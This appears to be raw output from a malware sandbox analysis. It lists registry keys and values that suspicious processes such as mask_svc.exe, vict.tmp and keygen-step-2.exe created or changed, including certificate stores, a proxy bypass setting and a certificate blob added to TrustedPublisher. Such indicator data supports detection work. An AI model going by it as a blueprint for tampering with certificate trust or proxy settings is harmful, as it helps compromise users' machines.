\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs vict.tmp Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-722 = "Central Pacific Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1822 = "Russia TZ 1 Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-215 = "Pacific Standard Time (Mexico)" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-691 = "Tasmania Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-251 = "Dateline Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2371 = "Easter Island Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1861 = "Russia TZ 6 Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1501 = "Turkey Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-202 = "US Mountain Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs vict.tmp Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-371 = "Jerusalem Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-602 = "Taipei Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-751 = "Tonga Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1502 = "Turkey Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2841 = "Saratov Daylight Time" mask_svc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs vict.tmp Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs vict.tmp Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople vict.tmp Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-841 = "Argentina Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-332 = "E. Europe Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-41 = "E. South America Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\PegasPc file.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust vict.tmp Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-252 = "Dateline Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-385 = "Namibia Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-961 = "Paraguay Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs vict.tmp Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-402 = "Arabic Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-82 = "Atlantic Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2002 = "Cabo Verde Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-561 = "SE Asia Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs vict.tmp Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs vict.tmp Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-141 = "Canada Central Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-492 = "India Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2412 = "Marquesas Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-651 = "AUS Central Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-281 = "Central Europe Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-334 = "Jordan Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe -
Modifies registry class 64 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdgeCP.exesvchost.exeMicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exevict.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeschtasks.exesvchost.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{XLCMX7L3-L6I1-MY60-TLXW-JIZNXKAMXM51}\1 = "6856" svchost.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B7216 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{26180B6B-4566-4003-9326-74ACFCEF2786} = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 405f003bab24d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" vict.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 998267c856add601 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-08760 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListInPrivateBrowsingAllowed = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus schtasks.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = 998267c856add601 MicrosoftEdge.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{JAGSC2K0-K4Q1-LO31-YATQ-QCFVCPKLJD69}\1 = "704" svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 998267c856add601 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus schtasks.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = f02f8ba2aa24d701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{0F38C51D-6568-4982-97EA-55D4D90F3E58} = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-08760 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "395205405" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-08760 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdgeCP.exe -
Processes:
vpn.tmplokpto41glk.exetapinstall.exekeygen-step-2.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f